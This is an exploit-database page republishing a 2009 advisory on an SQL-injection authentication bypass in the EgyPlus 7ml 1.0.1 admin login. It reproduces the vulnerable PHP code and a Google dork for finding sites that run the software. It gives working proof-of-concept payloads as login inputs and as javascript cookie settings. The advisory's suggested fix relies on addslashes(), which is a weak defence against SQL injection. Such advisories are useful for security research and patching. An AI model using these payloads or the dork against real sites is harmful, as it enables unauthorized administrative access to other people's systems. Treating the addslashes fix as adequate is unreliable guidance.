header-logo
Suggest Exploit
vendor:
EgyPlus 7ml
by:
Qabandi
8,8
CVSS
HIGH
Cookie Auth Bypass SQL injection vulnerability
89
CWE
Product Name: EgyPlus 7ml
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:egyplus:egyplus_7ml
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

EgyPlus 7ml <= 1.0.1 - Cookie Auth Bypass SQL injection vulnerability (CABSIV)

EgyPlus 7ml version 1.0.1 is vulnerable to a Cookie Auth Bypass SQL injection vulnerability (CABSIV). This vulnerability is due to the application not properly sanitizing user-supplied input in the 'username' and 'password' parameters of the 'login.php' script. An attacker can exploit this vulnerability to bypass authentication and gain access to the application. The attacker can also inject arbitrary SQL commands to the application, allowing them to access, modify, or delete data from the back-end database.

Mitigation:

Filter the input data and use prepared statements.
Source

Exploit-DB raw data:

                  ||          ||   | ||
           o_,_7 _||  . _o_7 _|| q_|_||  o_\\\_,
          (  :  /    (_)    /           (      .


=By: 	Qabandi
=Email:	iqa[a]hotmail.fr

	From Kuwait, PEACE...

=Vuln:		EgyPlus 7ml <= 1.0.1 - Cookie Auth Bypass SQL injection vulnerability (CABSIV)
=INFO:		http://egyplus.org/article-2.htm
=Download:  	http://traidnt.net/vb/attachment.php?attachmentid=252224&d=1211197439
=DORK:  	"Powered By EgyPlus"

                             _-=/:Conditions:\=-_
---------------------------------------------------------------------------------
; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = Off
--------------------------------------=_=---------------------------------------

                            _-=/:Vulnerable_Code:\=-_
---------------------------------------------------------------------------------
./cpanel/login.php::--

if($_COOKIE['username']){
$username = $_COOKIE['username']; <---- Not filtered
$password = $_COOKIE['password']; <---- Not filtered
}else{
$username = $_POST['username'];   <---- Not filtered
$password = $_POST['password'];   <---- Not filtered
}

$sql=$hazemali->query("select name,pass from admin where
name = '$username' and
pass = '$password' ");

$AdminInfo=$hazemali->num_rows($sql);

if($AdminInfo==1)  <---- Checks if MySQL statement is true then continues, FAIL...
{
---------------------------------------=_=--------------------------------------

                     _-=/:Proof-OF-Concept-or-Whatever:\=-_
---------------------------------------------------------------------------------
We have TWO ways to do this:

Login with these:

username: qabandi' or '1'='1
password: qabandi' or '1'='1


or we set cookies (longer version)
javascript:document.cookie = "username=qabandi' or '1'='1"
javascript:document.cookie = "password=qabandi' or '1'='1"
---------------------------------------=_=--------------------------------------

                            _-=/:SOLUTION:\=-_
---------------------------------------------------------------------------------
./cpanel/login.php::-- <== Change the code as following;

if($_COOKIE['username']){
$username = addslashes($_COOKIE['username']); <---- Filter with ADDSLASHES()
$password = addslashes($_COOKIE['password']); <---- Filter with ADDSLASHES()
}else{
$username = addslashes($_POST['username']); <---- Filter with ADDSLASHES()
$password = addslashes($_POST['password']); <---- Filter with ADDSLASHES()
}

$sql=$hazemali->query("select name,pass from admin where
name = '$username' and
pass = '$password' ");

$AdminInfo=$hazemali->num_rows($sql);

if($AdminInfo==1)
{
---------------------------------------=_=--------------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-
-=-=-=-==Bdon-=-za3al=-=-shabab-=-=el-thaghra-=-mafe=--=Mnha=--=-faydeh-==-==-=-
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-
-==-=-=-=-==-=-==-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=---=-==-=-==-=-=-=-=-=-=--
=-=-=-=-==-=-=-=-=-=-No----More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-
Salam to All Muslim Hackers.

# milw0rm.com [2009-06-03]

Navigation

Suggest Exploit

Services By CQR